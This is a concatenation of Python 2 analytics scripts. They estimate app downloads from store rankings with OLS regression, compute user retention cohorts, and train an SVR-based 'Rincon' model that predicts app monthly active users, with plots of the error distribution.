#store_id = df['store_id'][0:1]
df_est = regression(df, date)
#df_obs = df[df['date'] == date]
#print '**************************'
#print df_obs.head(30).values
#pdb.set_trace()
#del df_obs['actual_log']
#del df_obs['r_log']
df_est = df_est[['store_id', 'category_id', 'feed_id', 'date', 'app_id', 'rank', 'has_event_flag', 'actual', 'est']]
#print '**************************'
#print df_est.head(30).values
#pdb.set_trace()
#df_obs = df_obs.merge(df_est, on = ['store_id', 'category_id', 'feed_id', 'date', 'app_id'], how = 'left')
#print '**************************'
#print df_obs.head(30).values
#pdb.set_trace()
#return df_obs
return df_est
def regression(df, date):
test_out = []
for n, g in df.groupby(['category_id', 'feed_id']):
print n, date
rg_group = g['rg_rank'].drop_duplicates()
app_ids = g[['app_id']].drop_duplicates().reset_index()
del app_ids['index']
kf = KFold(len(app_ids), n_folds=5, indices=True, shuffle=True)
for rg_gr in rg_group:
train0 = g[((np.isnan(g['r_log']) == False) & (np.isnan(g['actual_log']) == False) & (np.isnan(g['has_event_flag']) == True))]
train0 = train0[train0['rg_rank'] == rg_gr]
test0 = g.dropna(subset = ['r_log'])
test0 = test0[test0['rg_rank'] == rg_gr]
test0 = test0[test0['date'] == date]
for tr, te in kf:
test = test0[(test0['app_id'].isin(app_ids.loc[te]['app_id']))]
train = train0[train0['app_id'].isin(app_ids.loc[tr]['app_id'])]
try:
model_ra1 = (sm.OLS.from_formula(formula ='actual_log ~ r_log', data = train))
fitted_ra1 = model_ra1.fit()
test['est'] = list(np.exp(fitted_ra1.predict(test[['r_log']])))
except Exception as e:
test['est'] = float(np.nan)
test_out.append(test)
if (test_out == []):
return pd.DataFrame()
test_out = pd.concat(test_out)
return test_out
def main():
global CONN
#global app_class_id
start_date = datetime.date(2013, 7, 1)
end_date = datetime.date(2013, 8, 1)
data_start_date = start_date + datetime.timedelta(days=-6)
data_end_date = end_date
CONN = None
app_class_id = get_appid()
store_ids = map(str, config.ANDROID_STORES_DICT.keys())
#store_ids = ['12']
DATES = daterange(start_date, end_date)
dataDATES = daterange(data_start_date, data_end_date)
#print DATES
for store_id in store_ids:
print('country = %s')%store_id
if int(store_id) < 45:
continue
CONN = None
downloads_df = get_actuals(store_id, data_start_date, data_end_date, 'downloads', 'units')
sales_df = get_actuals(store_id, data_start_date, data_end_date, 'sales', 'revenue')
db_actuals = pd.merge(downloads_df, sales_df, on=['date', 'app_class', 'store_id'], how='outer')
db_actuals[['store_id']] = db_actuals[['store_id']].astype(np.int)
db_actuals[['app_class', 'date', 'store_id']] = db_actuals[['app_class', 'date', 'store_id']].applymap(str)
del sales_df
del downloads_df
CONN = None
db_events = get_events(store_id, data_start_date, data_end_date)
db_events[['store_id', 'has_event_flag']] = db_events[['store_id', 'has_event_flag']].astype(np.int)
db_events[['app_id', 'date', 'store_id']] = db_events[['app_id', 'date', 'store_id']].applymap(str)
df_ranks = get_ranks(store_id, dataDATES, app_class_id)
df_ranks[['rank']] = df_ranks[['rank']].astype(np.int)
df_ranks[['app_class', 'date', 'store_id', 'app_id']] = df_ranks[['app_class', 'date', 'store_id', 'app_id']].applymap(str)
df = df_ranks.merge(db_actuals, on=['app_class', 'store_id', 'date'], how='left')
df = df.merge(db_events, on=['app_id', 'store_id', 'date'], how = 'left')
del db_events
del db_actuals
del df_ranks
df[['feed_id']] = df[['feed_id']].astype(np.int)
df['actual'] = np.nan
df['actual'][df['feed_id'] == 0] = df['downloads'][df['feed_id'] == 0]
df['actual'][df['feed_id'] == 1] = df['downloads'][df['feed_id'] == 1]
df['actual'][df['feed_id'] == 2] = df['sales'][df['feed_id'] == 2]
del df['downloads']
del df['sales']
del df['app_class']
df['rg_rank'] = 1
df['rg_rank'][df['rank']>20] = 21
df['rg_rank'][df['rank']>60] = 61
df['rg_rank'][df['rank']>200] = 201
df['r_log'] = np.log(df['rank'])
df['actual_log']=np.log(df['actual'])
#print df
#print df.head(100)
for date in DATES:
end_date2 = date.strftime("%Y-%m-%d")
start_date2 = (date - datetime.timedelta(days=7)).strftime("%Y-%m-%d")
df_obs = df[(df['date'] <= end_date2) & (df['date'] >= start_date2)]
print store_id, date
try:
#df_obs.to_csv('%s/benchmark_obs_%s_%s.csv'%(OUTPUT_FILES_PATH, store_id, date), index=False, quoting = csv.QUOTE_NONNUMERIC)
df_res = process_store_date(df_obs, date)
del df_obs
df_res.to_csv('%s/benchmark_data_%s_%s.csv'%(OUTPUT_FILES_PATH, store_id, date), index=False, quoting = csv.QUOTE_NONNUMERIC)
except Exception as e:
raise
print e, store_id, date
exc_type, exc_obj, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print(exc_type, fname, exc_tb.tb_lineno)
if __name__ == '__main__':
main()
<file_sep>/aa_au_model/lib/retention.py
def retention(final_selection_of_users, retention_for_new_users, percentages):
"""
retention_for_new_users, here you can set if you want to see retention based on users that are new first seen for that day (True) or all
users that are seen that day (False)
percentages, if True, shows percentages instead of absolute numbers retention
input data frame final_selection_of_users, as generated by final_selection_of_users()
"""
import pandas as pd
import datetime
# If percentages == True percentages, gives error if retention_date.iloc[0,2] doesn't excist (can happen if no new users for date)
users = final_selection_of_users[final_selection_of_users.country == 'US'][['device_id','date']]
users['active'] = 1
users['date'] = users.date.apply(lambda x: datetime.datetime(x.year,x.month,x.day))
users.set_index('date', inplace=True)
request_per_day = users.groupby('device_id').resample('1d',how='count')
request_per_day.reset_index(inplace=True)
request_per_day.columns = ['device_id','datetimestamp','timestamp']
request_per_day
dates = pd.date_range(start=final_selection_of_users.date.min(),end=final_selection_of_users.date.max())
resulti = None
for date in dates:
if retention_for_new_users == False:
selected_users = request_per_day[(request_per_day.datetimestamp == date) &
(request_per_day.timestamp > 0)]
else:
min_date_per_device = pd.DataFrame(request_per_day.groupby('device_id').datetimestamp.min()).reset_index()
selected_users = min_date_per_device[min_date_per_device.datetimestamp == date]
selected_users_after_date = pd.merge(request_per_day, selected_users, on='device_id')
selected_users_after_date = selected_users_after_date[selected_users_after_date.datetimestamp_x >= date]
selected_users_after_date['day_id'] = selected_users_after_date.datetimestamp_x - date
selected_users_after_date['day_id'] = selected_users_after_date.day_id.apply(lambda x: int(x)/86400000000000)
retention_date = pd.DataFrame(selected_users_after_date.groupby(['datetimestamp_y','day_id']).device_id.count()).reset_index()
if percentages == True and len(retention_date) > 0:
base_value = retention_date.iloc[0,2]
retention_date['device_id'] = retention_date.device_id.apply(lambda x: round(float(x)/float(base_value),2))
retention_date.iloc[0,2] = base_value
if resulti is None:
resulti = retention_date
else:
resulti = resulti.append(retention_date, ignore_index=True)
retention = resulti.pivot('datetimestamp_y','day_id')
return retention
<file_sep>/google-analytics/rincon_dump/KR-Android/Rincon_model.py
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.ticker as mtick
import datetime
import seaborn
import copy
import sys
import os
from sklearn.linear_model import Lasso, Ridge
from sklearn.svm import SVR, LinearSVR
from sklearn.ensemble import RandomForestRegressor
from sklearn.kernel_ridge import KernelRidge
from sklearn.ensemble import RandomForestRegressor
from sklearn import preprocessing
from sklearn.grid_search import GridSearchCV
from sklearn.metrics import mean_squared_error
from sklearn.metrics import make_scorer
from sklearn.cross_validation import cross_val_predict
from sklearn.cross_validation import cross_val_score
class Rincon:
def __init__(self, Debug=False):
self.vlookup = {'T1':{}, 'T2':{}}
self.T1 = None
self.T2 = None
self.outlierPerc = None
self.segments = None
self.Debug = Debug
# Select the raw features
self.features = ['bundle_id', 'Device Type', 'reporters_app', 'Date',
'reporters_all', 'category_id',
'Country',
'time_since_launch', 'Active Users',
'reporters_app_movingAvg',
#'downloads',
'moving_avg_dl', 'total_downloads']
self.numeric_cols = [u'reporters_app', u'reporters_all',
u'time_since_launch', u'reporters_app_movingAvg',
#'downloads',
'moving_avg_dl', 'total_downloads']
self.numeric_cols_log = [u'reporters_app_log', u'reporters_all_log',
u'time_since_launch', u'reporters_app_movingAvg_log',
#'downloads',
'moving_avg_dl_log', 'total_downloads_log']
self._model_ = None
self.best_param = None
self.scaler_ = None
self.featureName_ = None
self.scaler_data = None
def rate_MAE(self, y_truth, y_pred, cutoff=100.0):
assert y_truth.shape[0] == y_pred.shape[0], 'The size of Labels and Predictions do not match'
_data_ = pd.DataFrame( dict(truth=y_truth, prediction=list(y_pred)) )
_data_['error_rate'] = np.abs( (_data_['prediction'] - _data_['truth']) / _data_['truth'] )
# convert percent to numeric
if cutoff:
cutoff = float(cutoff) / 100.0
_data_ = _data_[_data_['error_rate'] <= cutoff]
_data_ = _data_.dropna()
return np.sum( _data_['error_rate'] ) / float(_data_['truth'].shape[0])
def load_data(self, filename, train=True):
#??? Training refers to the fact that it's has GA data, right?
#Yes
if train == True:
_data_ = pd.read_csv(filename)
_data_['Projected MAU DIFF %'] = _data_['reporters_app'] / _data_['Active Users'] - 1.0
_data_['Projected MAU DIFF %'] = _data_['Projected MAU DIFF %'].replace(np.inf, np.nan)
else:
try:
_data_ = pd.read_csv(filename)
_data_ = _data_.drop(['Session Duration'],axis=1)
_data_ = _data_.drop(['time_since_current_launch'], axis=1)
print 'Load data size before filtering:', _data_.shape
_data_ = _data_[~_data_['time_since_launch'].isnull()]
print 'Load data size after filtering:', _data_.shape
except:
raise KeyError
_data_['category_id'] = _data_['category_id'].apply(int).apply(str)
return _data_
def data_preprocessing(self, _data_, std_scale=None, target_col='Active Users',
exclude_col=['bundle_id', 'Active Users']):
if exclude_col:
x_ = _data_.drop(exclude_col, axis=1, inplace=False)
else:
x_ = _data_.copy()
features_to_log = ['reporters_app', 'reporters_all', 'reporters_app_movingAvg', 'moving_avg_dl','total_downloads']
# any numeric transformation should be entered here
x_['reporters_app'] = np.log(x_['reporters_app'])
x_['reporters_all'] = np.log(x_['reporters_all'])
x_['reporters_app_movingAvg'] = np.log(x_['reporters_app_movingAvg'])
x_['moving_avg_dl'] = np.log(x_['moving_avg_dl']+1.0) / x_['reporters_app_movingAvg']
x_['total_downloads'] = np.log(x_['total_downloads']+1.0) / x_['reporters_app']
x_.columns = map(lambda item: item + '_log' if (item in features_to_log) else item, x_.columns)
if target_col:
y_ = np.log(_data_[target_col])
self.scaler_ = preprocessing.StandardScaler().fit(x_[self.numeric_cols_log])
self.scaler_data = x_[self.numeric_cols_log]
else:
y_ = None
assert self.scaler_ is not None, ValueError('scaler has not been calucated!')
# Simple treatment of datetime
if 'Date' in x_.columns:
x_['month'] = x_['Date'].dt.month.apply(str)
x_['year'] = x_['Date'].dt.year.apply(str)
x_.drop(['Date'], axis=1, inplace=True)
try:
x_[self.numeric_cols_log] = self.scaler_.transform(x_[self.numeric_cols_log])
except:
ValueError('The feature scaler does not exist!')
# dummy coding
x_ = pd.get_dummies(x_)
if target_col:
self.featureName_ = x_.columns
return x_, y_
def optimizer(self, x_, y_, param_list, score_function, n_jobs=4):
'''
param_list: a container of the model parameters that varies algorithm by algorithm
'''
grid = GridSearchCV(self._model_, param_grid = param_list, cv=5,
scoring=score_function)
grid.fit(x_, y_)
self.best_param = grid.best_params_
print 'Scoring Function:', score_function
print "Parameter List:", param_list
print "Best Parameters:", self.best_param
def segmented_interporlation(self, rincon_pred, baseline_):
'''
T1: in-band largest MAU
T2: out-of-band largest MAU
'''
if baseline_ <= self.T1:
return rincon_pred
if baseline_ > self.T2:
return baseline_
else:
a1 = (self.T2 - baseline_) / (self.T2 - self.T1)
a2 = (baseline_ - self.T1) / (self.T2 - self.T1)
weighted = a1 * rincon_pred + a2 * baseline_
return weighted
def interpolation(self, _data_, predCol='pred_SVR', baseline_='reporters_app'):
interpolated_pred = []
for ind in xrange(_data_.shape[0]):
model_pred, mydm_v1 = _data_[[predCol, baseline_]].iloc[ind].tolist()
interpolated_pred.append(self.segmented_interporlation(model_pred, mydm_v1))
_data_['interpolated_pred'] = interpolated_pred
if self.Debug:
print 'DEBUG:\n', _data_[_data_['interpolated_pred'].isnull()]
assert any(_data_['interpolated_pred'].isnull())==False, 'NULL interpolcated MAU exists!'
def threshold_finder(self, _data_, threshold='in-band'):
if threshold == 'in-band':
qt = 1.0
else:
qt = 0.99
vlookup = _data_.groupby(['Country', 'Device Type']).\
agg({'reporters_app':lambda x:x.quantile(qt)}).reset_index()
vlookup = dict(zip(zip(vlookup['Country'], vlookup['Device Type']),
vlookup['reporters_app']))
if threshold == 'in-band':
for key, value in vlookup.iteritems():
if key in self.vlookup['T1']:
print 'Warning: rewriting T1 key =', key
self.vlookup['T1'][key] = value
elif threshold == 'out-of-band':
for key, value in vlookup.iteritems():
if key in self.vlookup['T2']:
print 'Warning: rewriting T2 key =', key
self.vlookup['T2'][key] = value
def model_train(self, _data_, modelName='svr', outlierPerc=[5,90], segments=[50,100], excludeIDs=None):
self.segments = segments
self.outlierPerc = outlierPerc
#print _data_['Projected MAU DIFF %']
# outlier filtering
thres = np.percentile(_data_['Projected MAU DIFF %'],
q=self.outlierPerc)
_data_ = _data_[(_data_['Projected MAU DIFF %']>=thres[0])
& (_data_['Projected MAU DIFF %'] <=thres[1])
].copy()
if self.Debug:
print '\nData Summary:'
print 'Outliers\' Error Rate Percentile:', self.outlierPerc, thres
# GA sampling issue filtering
thres = np.percentile(_data_['reporters_app'],
q=self.segments)
_data_ = _data_[(_data_['reporters_app']>=thres[0])
& (_data_['reporters_app'] <=thres[1])
].copy()
if excludeIDs:
_data_ = _data_[~_data_['bundle_id'].isin(excludeIDs)]
self.threshold_finder(_data_, threshold='in-band')
if self.Debug:
print 'App MAU Percentile:', segments, thres
#print _data_.groupby(['bundle_id', 'Device Type', 'Country']).\
#agg({'reporters_app':'mean',
# 'Projected MAU DIFF %':'mean',
# 'Active Users':'mean'}).\
#sort(['reporters_app'], ascending=False).head(25)
#print _data_.groupby(['Country', 'Date', 'Device Type']).\
#agg({'bundle_id':lambda x:x.nunique()})
#plot_3D(_data_, angle=25)
x_, y_ = self.data_preprocessing(_data_[self.features],
exclude_col=['bundle_id', 'Active Users', 'Date'])
#if self.Debug:
#print 'Check Z-Scaling Mean:\n', x_.mean()
#print 'Check Z-Scaling Stddev:\n', x_.std()
# grid search for best parameters
if modelName == 'svr':
# SVR with Linear Kernel
params = {'C':[2**i for i in range(-10,15)]}
self._model_ = SVR(C=10, tol=1e-8, kernel='linear', max_iter=2e5)
elif modelName == 'rbf':
# SVR with RBF Kernel
params = {'C':[2**i for i in range(20,35)], 'gamma':[2**i for i in range(-12,-2)]}
self._model_ = SVR(C=1e5, gamma=0.01, tol=1e-8, kernel='rbf', max_iter=2e5)
elif modelNmae == 'MARS':
# MARS
params = {'max_degree':[i for i in range(1,10)],
'penalty':[2**i for i in range(-2,2)],
'max_terms':[i for i in range(4,20)]}
self._model_ = pyearth.Earth(enable_pruning=True)
PMAE = make_scorer(self.rate_MAE, greater_is_better=False)
self.optimizer(x_, y_, params, n_jobs=7, score_function=PMAE)
# model initialization
if modelName == 'svr':
self._model_ = SVR(C=self.best_param['C'], tol=1e-8,
kernel='linear', max_iter=2e5)
elif modelName == 'rbf':
self._model_ = SVR(C=self.best_param['C'],
gamma=self.best_param['gamma'],
tol=1e-8,
kernel='rbf', max_iter=2e5)
elif modelName == 'MARS':
self._model_ = pyearth.Earth(max_degree=self.best_param['max_degree'],
max_terms=self.best_param['max_terms'],
penalty=self.best_param['penalty'],
enable_pruning=True)
if self.Debug:
# variable importance
rf = RandomForestRegressor(n_estimators=200, max_features= None, max_depth=8,
random_state=0, n_jobs=12)
indices_svr = self.variable_importance(rf, x_, y_, fnames=self.featureName_,
model_name='Random Forest', col='g', TOP_N=15)
pred = self.model_training_v2(self._model_, x_, y_, log=False,
baseline=np.log(_data_['reporters_app']), model_name='SVR')
_data_['pred_SVR'] = np.exp(pred)
print 'Number of negative MAU samples is:', _data_[_data_['pred_SVR']<=0].shape[0],
print 'out of total sample number =',_data_['pred_SVR'].shape[0]
print 'Samples with negative Rincon prediction:'
print _data_[_data_['pred_SVR']<=0]
del pred
# cross-validation performance
self.CV_performance(self._model_, x_, y_, n_folds=5)
# CDF curves
self.cdf_with_topapps_v2(_data_, TOPAPP_Bucket=4, xlim=100, pred_col='pred_SVR',
baseline='reporters_app', modelname='Linear SVR')
tmp = self.calculate_error_distribution(_data_, baseline='reporters_app', pred_col='pred_SVR')
#print tmp
self.plot_error_distribution(tmp, 'Linear SVR Error Rate CDF', cutoff=[0,100])
del tmp
#tmp = self.calculate_error_distribution_v1(_data_, baseline='reporters_app', pred_col='pred_SVR')
#self.plot_error_distribution(tmp, 'Linear SVR Error Rate CDF', cutoff=[-200,100])
#del tmp
#weights = 1.0 / np.log(_data_['reporters_app'])
self._model_.fit(x_, y_)
return _data_
def predict(self, _data_):
assert _data_['Country'].unique().shape[0] == 1 and \
_data_['Device Type'].unique().shape[0] == 1,\
'Make sure the data only contains 1 country and 1 device.'
self.T1 = self.vlookup['T1'][tuple(_data_[['Country', 'Device Type']].iloc[0,:])]
self.T2 = self.vlookup['T2'][tuple(_data_[['Country', 'Device Type']].iloc[0,:])]
'''
Deprecated below due to system apps:
if 'largest_mau_out_of_band' in _data_.columns:
self.T2 = _data_['largest_mau_out_of_band'].tolist()[0]
else:
self.T2 = self.vlookup['T2'][tuple(_data_[['Country', 'Device Type']].iloc[0,:])]
'''
if self.Debug:
print 'Validation data size:', _data_.shape
print '\nData Summary:'
print 'Lower bound T1 =', self.T1
print 'Upper bound T2 =', self.T2
print _data_.groupby(['Country', 'Date', 'Device Type']).\
agg({'bundle_id':lambda x:x.nunique()})
val_features = copy.copy(self.features)
val_features.remove('Active Users')
# select the raw features
x_, y_ = self.data_preprocessing(_data_[val_features],
exclude_col=['bundle_id', 'Date'],
target_col=None)
if self.Debug:
print 'Check 1: Removing redundant features:'
for name in x_.columns:
if name not in self.featureName_:
x_.drop(name, axis=1, inplace=True)
if self.Debug:
print name
if self.Debug:
print '\nCheck 2: Adding missing features:'
cnt = 0
for name in self.featureName_:
if name not in x_.columns:
x_.insert(cnt, name, 0)
if self.Debug:
print name
cnt += 1
# segmented models
_data_['raw_pred'] = np.exp(self._model_.predict(x_))
self.interpolation(_data_, predCol='raw_pred', baseline_='reporters_app')
# business constraints
_data_['final_pred'] = _data_.\
apply(lambda x: x['reporters_app']
if x['interpolated_pred']<=0
or x['interpolated_pred']>x['total_downloads']
else x['interpolated_pred'], axis=1)
if 'Active Users' in _data_.columns:
return _data_[['bundle_id', 'app_id', 'app_name','Country', 'Device Type',
'Date', 'category_name', 'Active Users', 'reporters_app',
'final_pred']]
else:
return _data_[['bundle_id', 'app_id','app_name', 'Country', 'Device Type',
'category_name', 'Date', 'final_pred', 'reporters_app']]
def variable_importance(self, _model_, x_training, y_training, fnames, model_name='Random Forest', col='r', TOP_N=50):
_model_.fit(x_training, y_training)
if model_name == 'Random Forest':
importances = _model_.feature_importances_
std = np.std([tree.feature_importances_ for tree in _model_.estimators_],
axis=0)
elif model_name == 'Linear Regression':
importances = np.abs(_model_.coef_)
std = np.array([0.0] * importances.shape[0])
elif model_name == 'SVR':
try:
importances = np.abs(_model_.coef_.T[:,0])
except:
try:
importances = np.abs(_model_.coef_)
except:
raise IndexError
std = np.array([0.0] * importances.shape[0])
assert model_name in ['Random Forest', 'Linear Regression', 'SVR'], \
ValueError('The model is beyond the current support model list for variable importance!')
indices_ = np.argsort(importances)[::-1]
# Print the feature ranking
print("Feature ranking:")
for f in range(TOP_N):
print("%d. feature %d -- %s (%f)" % (f + 1, indices_[f], fnames[indices_[f]],
importances[indices_[f]]))
# Plot the feature importances of the forest
fig, ax = plt.subplots(figsize=(15, 10))
plt.title("{} Feature Importances".format(model_name), fontsize=20)
plt.bar(range(TOP_N), importances[indices_[:TOP_N]],
color=col, yerr=std[indices_[:TOP_N]], align="center")
plt.xticks(range(TOP_N), [name.decode('utf8')
for name in list(fnames[indices_])], fontsize=12)
ax.set_xticklabels([name.decode('utf8')
for name in list(fnames[indices_])], rotation=90)
plt.yticks(fontsize=12)
ax.set_ylabel('Feature Importance', fontsize=15)
plt.xlim([-1, TOP_N])
plt.show()
return indices_
def normalized_MSE(self, y_truth, y_pred):
return np.sqrt( np.sum((y_pred - y_truth) ** 2) / np.sum(y_truth ** 2) )
def CV_performance(self, model, x_trainining, y_training, n_folds=5):
rmse = np.sqrt(-cross_val_score(model, x_trainining, y_training, cv=n_folds, scoring='mean_squared_error'))
print 'All features are included: RMSE = {} +- {}'.format(rmse.mean(), rmse.std())
NMSE = make_scorer(self.normalized_MSE, greater_is_better=False)
nmse = np.sqrt(-cross_val_score(model, x_trainining, y_training, cv=n_folds, scoring=NMSE))
print 'All features are included: NMSE = {} +- {}'.format(nmse.mean(), nmse.std())
PMAE = make_scorer(self.rate_MAE, greater_is_better=False)
pmae = -cross_val_score(model, x_trainining, y_training, cv=n_folds, scoring=PMAE)
print 'All features are included: PMAE = {} +- {}'.format(pmae.mean(), pmae.std())
def calculate_error_distribution(self, app_reporters, pred_col='pred', baseline='mydm_v1'):
mdm_vs_ga_benchmark = app_reporters.copy()
if baseline in app_reporters.columns:
#original error calculated by calc'ing % difference betwn mydm_v1 and Active Users
mdm_vs_ga_benchmark['abs_error[original]'] = 100 * np.abs(mdm_vs_ga_benchmark[baseline] / \
mdm_vs_ga_benchmark['Active Users'] - 1)
mdm_vs_ga_benchmark['abs_error[pred]'] = 100 * np.abs(mdm_vs_ga_benchmark[pred_col] / \
mdm_vs_ga_benchmark['Active Users'] - 1)
def _unique(_group):
return pd.Series({'app_count':_group.bundle_id.shape[0]})
_df = mdm_vs_ga_benchmark.reset_index().groupby(['Device Type', 'Country']).apply(_unique).reset_index()
error_distribution = pd.merge(mdm_vs_ga_benchmark.reset_index(),
_df,
on=['Device Type','Country'])
if baseline in app_reporters.columns:
error_distribution['proportion_of_error[original]'] = error_distribution.groupby(['Device Type','Country'])\
['abs_error[original]'].rank() \
/ error_distribution.app_count * 100.
error_distribution['proportion_of_error[pred]'] = error_distribution.groupby(['Device Type','Country'])\
['abs_error[pred]'].rank() \
/ error_distribution.app_count * 100.
error_distribution = error_distribution.set_index(['Device Type','Country','bundle_id'])
return error_distribution.reset_index()
def calculate_error_distribution_v3(self, app_reporters, pred_col='pred', baseline='mydm_v1'):
mdm_vs_ga_benchmark = app_reporters.copy()
if baseline in app_reporters.columns:
mdm_vs_ga_benchmark['abs_error[original]'] = 100 * np.abs(mdm_vs_ga_benchmark[baseline] / \
mdm_vs_ga_benchmark['Active Users'] - 1)
mdm_vs_ga_benchmark['abs_error[pred]'] = 100 * np.abs(mdm_vs_ga_benchmark[pred_col] / \
mdm_vs_ga_benchmark['Active Users'] - 1)
error_distribution = pd.DataFrame({'abs_error': np.arange(0,200)})
if baseline in app_reporters.columns:
count, bins = np.histogram(mdm_vs_ga_benchmark['abs_error[original]'], bins=np.arange(-1,200))
total = mdm_vs_ga_benchmark['abs_error[original]'].dropna().shape[0]
error_distribution['proportion_of_error[original]'] = 100.0*np.cumsum(count) / total
count, bins = np.histogram(mdm_vs_ga_benchmark['abs_error[pred]'], bins=np.arange(-1,200))
total = mdm_vs_ga_benchmark['abs_error[pred]'].dropna().shape[0]
error_distribution['proportion_of_error[pred]'] = 100.0*np.cumsum(count) / total
return error_distribution
def calculate_error_distribution_v1(self, app_reporters, pred_col='pred', baseline='mydm_v1'):
mdm_vs_ga_benchmark = app_reporters.copy()
if baseline in app_reporters.columns:
mdm_vs_ga_benchmark['abs_error[original]'] = 100 * (mdm_vs_ga_benchmark[baseline] / \
mdm_vs_ga_benchmark['Active Users'] - 1)
mdm_vs_ga_benchmark['abs_error[pred]'] = 100 * (mdm_vs_ga_benchmark[pred_col] / \
mdm_vs_ga_benchmark['Active Users'] - 1)
def _unique(_group):
return pd.Series({'app_count':_group.bundle_id.shape[0]})
_df = mdm_vs_ga_benchmark.reset_index().groupby(['Device Type', 'Country']).apply(_unique).reset_index()
error_distribution = pd.merge(mdm_vs_ga_benchmark.reset_index(),
_df,
on=['Device Type','Country'])
if baseline in app_reporters.columns:
error_distribution['proportion_of_error[original]'] = error_distribution.groupby(['Device Type','Country'])\
['abs_error[original]'].rank() \
/ error_distribution.app_count * 100.
error_distribution['proportion_of_error[pred]'] = error_distribution.groupby(['Device Type','Country'])\
['abs_error[pred]'].rank() \
/ error_distribution.app_count * 100.
error_distribution = error_distribution.set_index(['Device Type','Country','bundle_id'])
return error_distribution.reset_index()
def calculate_error_distribution_v2(self, app_reporters, pred_col='pred', baseline='mydm_v1'):
mdm_vs_ga_benchmark = app_reporters.copy()
if baseline in app_reporters.columns:
mdm_vs_ga_benchmark['abs_error[original]'] = \
mdm_vs_ga_benchmark.apply(lambda x:
100 * (x[baseline] / x['Active Users'] - 1)
if x[baseline] > x['Active Users']
else 100 * (x['Active Users'] / x[baseline] - 1),
axis=1)
mdm_vs_ga_benchmark['abs_error[pred]'] = \
mdm_vs_ga_benchmark.apply(lambda x:
100 * (x[pred_col] / x['Active Users'] - 1)
if x[pred_col] > x['Active Users']
else 100 * (x['Active Users'] / x[pred_col] - 1),
axis=1)
def _unique(_group):
return pd.Series({'app_count':_group.bundle_id.shape[0]})
_df = mdm_vs_ga_benchmark.reset_index().groupby(['Device Type', 'Country']).apply(_unique).reset_index()
error_distribution = pd.merge(mdm_vs_ga_benchmark.reset_index(),
_df,
on=['Device Type','Country'])
if baseline in app_reporters.columns:
error_distribution['proportion_of_error[original]'] = error_distribution.groupby(['Device Type','Country'])\
['abs_error[original]'].rank() \
/ error_distribution.app_count * 100.
error_distribution['proportion_of_error[pred]'] = error_distribution.groupby(['Device Type','Country'])\
['abs_error[pred]'].rank() \
/ error_distribution.app_count * 100.
error_distribution = error_distribution.set_index(['Device Type','Country','bundle_id'])
return error_distribution.reset_index()
def plot_error_distribution(self, error_distribution, title_template, cutoff=[0,200]):
nlevels = error_distribution['Device Type'].nunique()
groupby_order = ['Country', 'Device Type']
count = 1
legend_list = []
ticks = mtick.FormatStrFormatter('%.0f%%')
col_list = [seaborn.xkcd_rgb['pale red'], seaborn.xkcd_rgb['medium green'],
'orange', seaborn.xkcd_rgb['denim blue'], seaborn.xkcd_rgb['medium green'], ]
for x,g in error_distribution.groupby(groupby_order):
if count % nlevels == 1:
fig = plt.figure()
ax = fig.add_subplot(111)
ax.xaxis.set_major_formatter(ticks)
ax.yaxis.set_major_formatter(ticks)
print 'Rincon:'
print g[(g['abs_error[pred]']>=19)
&(g['abs_error[pred]']<=21)][['proportion_of_error[pred]', 'abs_error[pred]']]
print g[(g['abs_error[pred]']>=39)
&(g['abs_error[pred]']<=41)][['proportion_of_error[pred]', 'abs_error[pred]']]
print g[(g['abs_error[pred]']>=59)
&(g['abs_error[pred]']<=61)][['proportion_of_error[pred]', 'abs_error[pred]']]
g[pd.notnull(g['proportion_of_error[pred]'])].sort('abs_error[pred]').\
set_index('abs_error[pred]')['proportion_of_error[pred]'].\
plot(style='k-', figsize=(15,10), lw=4, fontsize=15, c=col_list[count % nlevels - 1])
legend_list.append('-'.join(x) + '_Rincon')
if 'proportion_of_error[original]' in error_distribution.columns:
print 'Baseline:'
print g[(g['abs_error[original]']>=19)
&(g['abs_error[original]']<=21)][['proportion_of_error[original]', 'abs_error[original]']]
print g[(g['abs_error[original]']>=39)
&(g['abs_error[original]']<=41)][['proportion_of_error[original]', 'abs_error[original]']]
print g[(g['abs_error[original]']>=59)
&(g['abs_error[original]']<=61)][['proportion_of_error[original]', 'abs_error[original]']]
g[pd.notnull(g['proportion_of_error[original]'])].sort('abs_error[original]').\
set_index('abs_error[original]')['proportion_of_error[original]'].\
plot(style='--', figsize=(15,10), lw=4, fontsize=15, alpha=1.0,
c=seaborn.xkcd_rgb['pale red'])
legend_list.append('-'.join(x) + '_MDM_v1.1')
plt.ylabel('proportion of apps', fontsize=23)
plt.xlabel('absolute percentage error', fontsize=23)
plt.legend(legend_list, loc = 'lower right', prop={'size':23})
plt.xlim(cutoff)
plt.title( x[0] + ' : ' + title_template, fontsize=25)
if count % nlevels == 0:
plt.show()
legend_list = []
count += 1
def calculate_error_superimpose(self, app_reporters, pred_cols=['pred'], baseline='mdm_v1'):
mdm_vs_ga_benchmark = app_reporters.copy()
if baseline in mdm_vs_ga_benchmark.columns:
assert any(mdm_vs_ga_benchmark[baseline].isnull())==False, 'Appending baseline numbers fails!'
mdm_vs_ga_benchmark['abs_error[original]'] = 100 * np.abs(mdm_vs_ga_benchmark[baseline] / \
mdm_vs_ga_benchmark['Active Users'] - 1)
for key in pred_cols:
mdm_vs_ga_benchmark['mau_{}'.format(key)] = mdm_vs_ga_benchmark[key]
mdm_vs_ga_benchmark['abs_error[{}]'.format(key)] = 100 * np.abs(mdm_vs_ga_benchmark['mau_{}'.format(key)] / \
mdm_vs_ga_benchmark['Active Users'] - 1)
def _unique(_group):
return pd.Series({'app_count':_group.bundle_id.shape[0]})
_df = mdm_vs_ga_benchmark.reset_index().groupby(['Device Type', 'Country']).apply(_unique).reset_index()
error_distribution = pd.merge(mdm_vs_ga_benchmark.reset_index(),
_df,
on=['Device Type','Country'])
if baseline in mdm_vs_ga_benchmark.columns:
error_distribution['proportion_of_error[original]'] = error_distribution.groupby(['Device Type','Country'])\
['abs_error[original]'].rank() \
/ error_distribution.app_count * 100.
for key in pred_cols:
error_distribution['proportion_of_error[{}]'.format(key)] = \
error_distribution.groupby(['Device Type','Country'])\
['abs_error[{}]'.format(key)].rank() \
/ error_distribution.app_count * 100.
error_distribution = error_distribution.set_index(['Device Type','Country','bundle_id'])
return error_distribution.reset_index()
def plot_error_superimpose(self, error_distribution, title_template, pred_cols=['pred'], cutoff=[0,200], nlevels=3):
n_plots = 1
groupby_order = ['Country', 'Device Type']
count = 1
legend_list = []
#Plotting constant
ticks = mtick.FormatStrFormatter('%.0f%%')
col_list = seaborn.color_palette('deep')
